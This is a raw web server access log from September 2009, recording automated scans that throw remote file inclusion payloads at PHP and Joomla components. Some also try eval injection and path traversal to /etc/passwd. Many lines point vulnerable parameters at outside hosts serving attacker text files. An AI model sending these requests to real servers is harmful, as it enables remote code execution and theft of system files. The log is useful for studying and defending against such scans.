121.78.225.23 - - [06/Sep/2009:23:56:39 -0500] "GET /logs/access_log.1241654400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:56:39 -0500] "GET /logs/access_log.1247097600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.218.40.180 - - [06/Sep/2009:23:56:55 -0500] "GET /logs/access_log.1241222400//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
211.218.40.180 - - [06/Sep/2009:23:56:56 -0500] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
211.218.40.180 - - [06/Sep/2009:23:56:56 -0500] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
65.38.188.164 - - [06/Sep/2009:23:57:05 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:05 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:05 -0500] "GET /logs/access_log.1243814400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:05 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:05 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:06 -0500] "GET /logs/access_log.1243814400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:57:19 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:57:23 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:57:23 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:27 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:57:36 -0500] "GET /logs/access_log.1241308800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.38.188.164 - - [06/Sep/2009:23:57:44 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:57:48 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.160 - - [06/Sep/2009:23:58:02 -0500] "GET /logs/access_log.1213488000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.225.23 - - [06/Sep/2009:23:58:27 -0500] "GET /logs/access_log.1241395200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:59:36 -0500] "GET /logs/access_log.1246924800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
123.242.165.138 - - [07/Sep/2009:00:00:09 -0500] "GET /zboard.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.78.225.23 - - [07/Sep/2009:00:01:12 -0500] "GET /logs/access_log.1241481600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [07/Sep/2009:00:01:12 -0500] "GET /logs/access_log.1241913600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.89.97 - - [07/Sep/2009:00:01:26 -0500] "GET //?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.115.89.97 - - [07/Sep/2009:00:01:26 -0500] "GET /logs/access_log.1241222400%20%20//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.115.89.97 - - [07/Sep/2009:00:01:27 -0500] "GET /logs//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
121.78.225.23 - - [07/Sep/2009:00:01:28 -0500] "GET /logs/access_log.1242518400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [07/Sep/2009:00:01:29 -0500] "GET /logs/access_log.1247356800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [07/Sep/2009:00:01:35 -0500] "GET /logs/access_log.1237939200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
123.242.165.138 - - [07/Sep/2009:00:02:40 -0500] "GET /zboard.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.38.188.164 - - [07/Sep/2009:00:09:19 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:19 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:19 -0500] "GET /logs/access_log.1243814400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:20 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:20 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:21 -0500] "GET /logs/access_log.1243814400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:41 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:00:09:46 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:10:34 -0500] "GET /logs/access_log.1239062400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:11:27 -0500] "GET /logs/access_log.1238198400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.89.97 - - [07/Sep/2009:00:12:17 -0500] "GET //login.php?svr_rootscript=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.115.89.97 - - [07/Sep/2009:00:12:17 -0500] "GET /logs//login.php?svr_rootscript=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.115.89.97 - - [07/Sep/2009:00:12:17 -0500] "GET /logs/access_log.1245456000//login.php?svr_rootscript=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:13:31 -0500] "GET /logs/access_log.1246579200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:13:47 -0500] "GET /logs/access_log.1238716800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:13:47 -0500] "GET /logs/access_log.1248048000//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:13:47 -0500] "GET /logs/access_log.1239753600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:14:38 -0500] "GET /logs/access_log.1240185600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:14:39 -0500] "GET /logs/access_log.1243123200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:16:11 -0500] "GET /logs/access_log.1242864000//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:16:11 -0500] "GET /logs/access_log.1241654400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:17:36 -0500] "GET /logs/access_log.1247097600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:17:36 -0500] "GET /logs/access_log.1241308800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:19:27 -0500] "GET /logs/access_log.1241395200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
86.59.104.147 - - [07/Sep/2009:00:20:41 -0500] "GET /logs/access_log.1236038400//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
86.59.104.147 - - [07/Sep/2009:00:20:41 -0500] "GET //setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
86.59.104.147 - - [07/Sep/2009:00:20:41 -0500] "GET /logs//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
86.59.104.147 - - [07/Sep/2009:00:21:15 -0500] "GET /logs/access_log.1236211200//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:21:45 -0500] "GET /logs/access_log.1246924800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
59.106.19.105 - - [07/Sep/2009:00:23:37 -0500] "GET /logs/access_log.1236038400//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.106.19.105 - - [07/Sep/2009:00:23:37 -0500] "GET /logs//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.106.19.105 - - [07/Sep/2009:00:23:38 -0500] "GET //setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.106.19.105 - - [07/Sep/2009:00:23:46 -0500] "GET /logs/access_log.1236211200//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:24:07 -0500] "GET /logs/access_log.1241481600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:24:14 -0500] "GET /logs/access_log.1241913600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:24:14 -0500] "GET /logs/access_log.1242518400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:24:19 -0500] "GET /logs/access_log.1247356800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.204.148.251 - - [07/Sep/2009:00:24:33 -0500] "GET /logs/access_log.1237939200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
203.130.198.40 - - [07/Sep/2009:00:29:03 -0500] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.813"
203.130.198.40 - - [07/Sep/2009:00:29:03 -0500] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.813"
203.130.198.40 - - [07/Sep/2009:00:30:16 -0500] "GET /logs/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.813"
203.130.198.40 - - [07/Sep/2009:00:30:16 -0500] "GET /com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.813"
203.130.198.40 - - [07/Sep/2009:00:30:27 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 361 "-""libwww-perl/5.813"
203.130.198.40 - - [07/Sep/2009:00:30:27 -0500] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 356 "-""libwww-perl/5.813"
99.198.106.178 - - [07/Sep/2009:00:31:06 -0500] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:00:31:06 -0500] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:00:31:06 -0500] "GET /logs/access_log.1243987200//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:00:31:15 -0500] "GET /logs/access_log.1243296000//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:00:31:31 -0500] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.universitehaber.com/yuo.txt%0D? HTTP/1.1" 404 342 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
207.58.163.86 - - [07/Sep/2009:00:31:31 -0500] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.universitehaber.com/yuo.txt%0D? HTTP/1.1" 404 337 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
128.177.11.182 - - [07/Sep/2009:00:33:09 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:33:09 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:33:09 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:33:12 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:33:15 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:33:15 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:33:15 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:37:35 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:37:44 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:38:02 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.177.11.182 - - [07/Sep/2009:00:38:06 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.65.20.79 - - [07/Sep/2009:00:39:35 -0500] "GET /logs/modules/mod_weather.php?absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:00:39:35 -0500] "GET /modules/mod_weather.php?absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:00:39:47 -0500] "GET /logs//components/com_minibb/bb_plugins.php?absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:00:39:52 -0500] "GET //components/com_minibb/bb_plugins.php?absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
65.55.106.206 - - [07/Sep/2009:00:40:05 -0500] "GET /logs/access_log.1109289600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.148.68.101 - - [07/Sep/2009:00:42:08 -0500] "GET /logs/tarnet/addons/slideshow_full.php?album_name=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:00:42:08 -0500] "GET /tarnet/addons/slideshow_full.php?album_name=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:00:42:08 -0500] "GET /logs/access_log.1248134400/tarnet/addons/slideshow_full.php?album_name=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:00:42:09 -0500] "GET /tarnet/addons/slideshow_full.php?album_name=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:00:42:09 -0500] "GET /logs/tarnet/addons/slideshow_full.php?album_name=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.68.101 - - [07/Sep/2009:00:42:09 -0500] "GET /logs/access_log.1248134400/tarnet/addons/slideshow_full.php?album_name=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.65.20.79 - - [07/Sep/2009:00:42:13 -0500] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:00:42:14 -0500] "GET /logs/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.814"
206.225.23.4 - - [07/Sep/2009:00:42:20 -0500] "GET /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:20 -0500] "GET /logs/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:20 -0500] "GET /logs/access_log.1247270400/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:20 -0500] "GET /logs/access_log.1247702400/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:21 -0500] "GET /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:21 -0500] "GET /logs/access_log.1247270400/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:21 -0500] "GET /logs/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:22 -0500] "GET /logs/access_log.1247702400/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:00:42:27 -0500] "GET /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
